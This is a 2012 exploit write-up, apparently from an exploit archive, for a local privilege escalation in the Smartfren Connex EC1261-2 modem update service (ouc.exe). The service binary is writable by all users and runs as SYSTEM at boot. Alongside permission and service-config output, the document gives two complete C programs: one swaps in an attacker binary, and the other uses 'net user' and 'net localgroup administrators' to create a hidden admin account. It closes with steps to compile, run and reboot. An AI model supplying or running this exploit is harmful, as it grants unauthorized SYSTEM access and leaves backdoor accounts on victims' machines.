========
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
========
:--------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
: # Date : 26 September 2012
: # Author : X-Cisadane
: # Software Link : http://www.smartfren.com/data/ec1261.html
: # File Version : 21.005.15.03.836
: # Category : Desktop (Windows) Applications
: # Platform : Win32 & Win64
: # Vulnerability : Local Privilege Escalation Vulnerability
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------:
Summary
========
Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files.
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.
Description
===========
Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice.
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges.
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).
Proof of Concept
================
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
----------------------------------------------------------------------------------------------
The following attack scenario could be used :
1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file.
For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
Rename the file to ouc.exe.old
2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
3. Restart the system.
After restart attackers malicious file will be executed with SYSTEM privileges.
You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:\sploit.cpp
#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{
MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
return 0;
}
Compile these script below with Dev-C++
Save in the C:\bin.cpp
#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:\
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.